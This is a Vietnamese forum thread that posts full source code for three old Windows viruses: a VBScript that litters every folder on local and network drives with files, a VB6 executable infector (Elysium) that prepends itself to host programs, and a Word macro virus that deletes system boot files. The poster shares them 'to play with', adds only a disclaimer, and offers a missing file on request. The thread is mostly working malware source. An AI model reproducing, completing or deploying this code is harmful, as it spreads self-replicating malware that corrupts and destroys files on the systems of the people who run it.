Virus code example

Buồn đời ngồi viết vài bài cung cấp vài mã virus cho bà con vọc chơi cho vui.(những con nầy còn manh lắm đó đừng có dại mà dịch lại thành exe thì khổ, tôi không chịu trách nhiệm đâu). Bà con coi đễ thấu hiểu lòng dạ của con virus thôi, chứ đừng có làm chuyện dại dột đó

khởi đầu là con DL Hello của cụ hacker DL (biệt danh riêng của hacker)
cong dl hello viết bằng mã vb chạy trên môi trường win32

Code:


rem - VBS/dlH "DL Hello" Virus - By D.L.
rem - Written on November 12th, 2003

On Error Resume Next
dim FSobj,orgMes,finalMes
set FSobj=CreateObject("scripting.FileSystemObject")

orgMes="Hello! Don't be mad...I'm not a bad bug :) - by *|%|"
orgMes=replace(orgMes,chr(42),chr(68))
orgMes=replace(orgMes,chr(124),chr(46))
finalMes=replace(orgMes,chr(37),chr(76))


On Error Resume Next
dim drive,machine

set machine=FSobj.Drives
for each drive in machine 
    if (drive.DriveType=2)or(drive.DriveType=3) then
       indexFolders(drive.Path&"\")
   end If
next


sub indexFolders(location)
   On Error Resume Next
   dim specs,file,subFol,sayHello

   set specs=FSobj.GetFolder(location)
   set subFol=specs.SubFolders

   for each file in subFol
                set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True)
      sayHello.write finalMes
      sayHello.Close
      writeData(file.Path)
      indexFolders(file.Path)
   next
end sub

sub writeData(location)
   On Error Resume Next
        dim folder,directory,file,sayHello

   set folder=FSobj.GetFolder(location)
   set directory=folder.Files

   for each file in directory
       set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True)
      sayHello.write finalMes
      sayHello.Close 
   next
end sub


Còn tiếp đến là con Elysium của lảo Rott_En

còn dưới dây là mô tả dôi nét về virus: Shortly and to the point. Just a proof to myself that I can write a simple .exe infector in VB6. infects one file per run found in current directory. Rather harmless, uses custom encryption technique and inspired from The Hacker's Manifesto message payload (on each month with 31 days, on the 31 st, it displayes the following message:

"You can stop this individual, but you cant stop us all!"
con nầy phức tạp hơn gồm có 4 file
file Elysium.vbp

Code:


Type=Exe
Form=frmMain.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\..\WINDOWS\System32\stdole2.tlb#OLE Automation
IconForm="frmMain"
Startup="frmMain"
HelpFile=""
Title="Elysium"
ExeName32="Elysium.exe"
Path32="..\bin"
Command32=""
Name="Elysium"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Rott_En/DCA"
VersionFileDescription="Elysium"
VersionLegalCopyright="Rott_En/DCA"
VersionLegalTrademarks="Elysium"
VersionProductName="Elysium"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1



file Elysium.vbw

Code:


frmMain = 44, 58, 749, 581, Z, 22, 29, 727, 552, C


file frmMain.frm

Code:


VERSION 5.00
Begin VB.Form frmMain
  BorderStyle    =  0  'None
  ClientHeight    =  90
  ClientLeft      =  0
  ClientTop      =  0
  ClientWidth    =  90
  Icon            =  "frmMain.frx":0000
  LinkTopic      =  "Form1"
  ScaleHeight    =  90
  ScaleWidth      =  90
  ShowInTaskbar  =  0  'False
  StartUpPosition =  3  'Windows Default
  Visible        =  0  'False
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'======================================================
'|  Elysium                                          |
'|  Rott_En | Dark Coderz Alliance                    |
'|  Infect one executable per run in curent directory |
'|  Slow infection method                            |
'======================================================
Option Explicit
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private XfileX As Long
Private HIM As Long
Private KillIt As Long
Const a0a1a0a1 As Long = &H103
Const b1b0b1b0 As Long = &H1F0FFF
Public MePath As String
Public Host As String
Const ElysiumSig = "Elysium Virus by Rott_En/DCA"
Dim a, b, c, d, e, f, q, x, z, txt, txt2

Private Sub Form_Load()
On Error Resume Next
Dim hpath As String
Dim lenght As String
Dim cerberi, genom
Dim tmpsig, tmpsign, chk As String
App.TaskVisible = False
MePath = App.Path
If Right(MePath, 1) <> "\" Then MePath = MePath & "\"
Host = Dir$(MePath & "*.exe")
While Host <> ""
hpath = hpath & Host & "/"
Host = Dir$
Wend
cerberi = Split(hpath, "/")
For Each genom In cerberi
Open MePath & genom For Binary Access Read As #1
lenght = (LOF(1))
tmpsig = Space(lenght)
Get #1, , tmpsign
Close #1
chk = Right(tmpsign, 28)
If chk <> Chr(69) + Chr(108) + Chr(121) + Chr(115) + Chr(105) + Chr(117) + Chr(109) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(82) + Chr(111) + Chr(116) + Chr(116) + Chr(95) + Chr(69) + Chr(110) + Chr(47) + Chr(68) + Chr(67) + Chr(65) Then
GoTo unholyfile
Else
GoTo holyfile
End If
unholyfile:
Bless (MePath & genom)
Exit For
holyfile:
Next genom
Resurrect (MePath & App.EXEName & ".exe")
End Sub

Function Bless(file As String)
On Error Resume Next
Dim filebyte1 As String
Dim ElysiumLen1 As String
Dim scrambleh As String
MePath = App.Path
If Right(MePath, 1) <> "\" Then MePath = MePath & "\"
Open file For Binary Access Read As #1
filebyte1 = Space(LOF(1))
Get #1, , filebyte1
Close #1
Open MePath & App.EXEName & ".exe" For Binary Access Read As #2
ElysiumLen1 = Space(32768)
Get #2, , ElysiumLen1
Close #2
scrambleh = Encrypt(filebyte1)
Open file For Binary Access Write As #3
Put #3, , ElysiumLen1
Put #3, , scrambleh
Put #3, , ElysiumSig
Close #3
End Function

Function Resurrect(file As String)
On Error Resume Next
Dim filebyte2 As String
Dim ElysiumLen2 As String
Dim descrambleh As String
MePath = App.Path
If Right(MePath, 1) <> "\" Then MePath = MePath & "\"
Open file For Binary Access Read As #1
ElysiumLen2 = Space(10752)
filebyte2 = Space(LOF(1) - 10752)
Get #1, , filebyte2
Get #1, , ElysiumLen2
Close #1
descrambleh = Decrypt(filebyte2)
Open MePath & Chr(101) + Chr(108) + Chr(121) + Chr(115) + Chr(105) + Chr(117) + Chr(109) + Chr(46) + Chr(99) + Chr(111) + Chr(109) For Binary Access Write As #2
Put #2, , descrambleh
Close #2
HIM = Shell(MePath & Chr(101) + Chr(108) + Chr(121) + Chr(115) + Chr(105) + Chr(117) + Chr(109) + Chr(46) + Chr(99) + Chr(111) + Chr(109), vbNormalFocus)
XfileX = OpenProcess(b1b0b1b0, False, HIM)
GetExitCodeProcess XfileX, KillIt
Do While KillIt = a0a1a0a1
DoEvents
GetExitCodeProcess XfileX, KillIt
Loop
Kill MePath & Chr(101) + Chr(108) + Chr(121) + Chr(115) + Chr(105) + Chr(117) + Chr(109) + Chr(46) + Chr(99) + Chr(111) + Chr(109)
Call ChkPayload
End Function

Function Encrypt(code)
q = ""
a = RandomNumber(9) + 32
b = RandomNumber(9) + 32
c = RandomNumber(9) + 32
d = RandomNumber(9) + 32
q = Chr(a) & Chr(b) & Chr(c)
e = 1

For x = 1 To Len(code)
f = Mid(code, x, 1)
If e = 1 Then q = q & Chr(Asc(f) + a)
If e = 2 Then q = q & Chr(Asc(f) + b)
If e = 3 Then q = q & Chr(Asc(f) + c)
If e = 4 Then q = q & Chr(Asc(f) + d)
e = e + 1
If e > 4 Then e = 1
Next x
q = q & Chr(d)
Encrypt = q
End Function

Function Decrypt(code)
q = ""
z = Left(code, 3)
a = Left(z, 1)
b = Mid(z, 2, 1)
c = Mid(z, 3, 1)
d = Right(code, 1)
a = Int(Asc(a)) 'key1
b = Int(Asc(b)) 'key2
c = Int(Asc(c)) 'key3
d = Int(Asc(d)) 'key4
txt = Left(code, Len(code) - 1)
txt2 = Mid(txt, 4, Len(txt))

For x = 1 To Len(txt2)
f = Mid(txt2, x, 1)
If e = 1 Then q = q & Chr(Asc(f) - a)
If e = 2 Then q = q & Chr(Asc(f) - b)
If e = 3 Then q = q & Chr(Asc(f) - c)
If e = 4 Then q = q & Chr(Asc(f) - d)
e = e + 1
If e > 4 Then e = 1
Next x
Decrypt = q
End Function

Function RandomNumber(number)
Randomize
RandomNumber = Int((Val(number) * Rnd) + 1)
End Function

Sub ChkPayload()
If Day(Now) > 30 Then
MsgBox "You can stop this individual, but you cant stop us all!", vbInformation, "tructulan"
Else
End If
End Sub


và cuối cùng là file
file frmMain.frx
ai có nhu cầu xin liên hệ.

Ác quá đi
Dám phát tán virut he???

Không dám không dám. Bần đạo chỉ úp mã virus lên thôi chứ đâu có úp virus...
heeeeeeeeeeeeee

Bửa nay tặng thêm một con nữa nè.
viết bằng vb cho hdh win32
dưới đay là mô tả

virus tên là Galicia Kalidade của tắc giả MaD MoTHeR TeaM
his baby is the smallest macro virus ever (as far as i know). I wrote it as a code example of the VBA language tutorial published in this issue.

It's an encrypted WinWord infector which infects on AutoClose and... look at this... it's the unique virus in the world which infects by 'doing' a dir a:... but not in the way you're supposing ;-)

On AutoClose, it copies itself and checks the closed document for the words 'dir a:', ignoring any case or font... if such string is found, it will delete MSDOS.SYS and IO.SYS and then display a message box.

Btw, as this is the first spanish macro virus, i decided to write it so it will work only under spanish versions of WinWord :-)

Code:


'
'                                            ������� ������� �������
'          Galicia Kalidade                  ��� ��� ��� ��� ��� ���
'          (@) MaD MoTHeR TeaM                ������ ������� �������
'                                            ������� ������� ��� ���
'                                            ������� ������� ��� ���
'
' This baby is the smallest macro virus ever (as far as i know). I wrote it
' as a code example of  the VBA language  tutorial published in this issue.
'
' It's an encrypted WinWord infector which infects on AutoClose and... look
' at this... it's the  unique virus in the world which infects by 'doing' a
' dir a:... but not in the way you're supposing ;-)
'
' On AutoClose, it copies  itself and  checks  the closed  document for the
' words 'dir a:', ignoring any  case or font... if such string is found, it
' will delete MSDOS.SYS and IO.SYS and then display a message box.
'
' Btw, as this is the first spanish  macro virus, i decided  to write it so
' it will work only under spanish versions of WinWord :-)
 
 
Sub Main
nombre$ = NombreVentana$() + ":AutoClose"
MacroCopiar nombre$, "Global:AutoClose", 1
ArchivoGuardarComo .Format = 1
MacroCopiar "Global:AutoClose", nombre$, 1
PrincipioDeDocumento
Edici�nBuscarEliminarFormato
Edici�nBuscar .Buscar = "DIR A:", .PalabraCompleta = 0, \
              .CoincidirMay�sMin�s = 0, .Direcciones = 0, \
              .Ajuste = 0
If Edici�nBuscarEncontrado() <> 0 Then
              FijarAtributos "C:\IO.SYS",0
              Fijar Atributos "C:\MSDOS.SYS",0
              Kill "C:\IO.SYS"
              Kill "C:\MSDOS.SYS"
              MsgBox "El virus Galicia Kalidade ha actuado" , \
                    "Galicia Kalidade", 16
End If
End Sub
 
 
' Hey! What  are you  looking for? *THAT* supertiny thing is a 100% working
' macro virus... didn't you believe me when i told you this is the smallest
' WW infector ever? :-)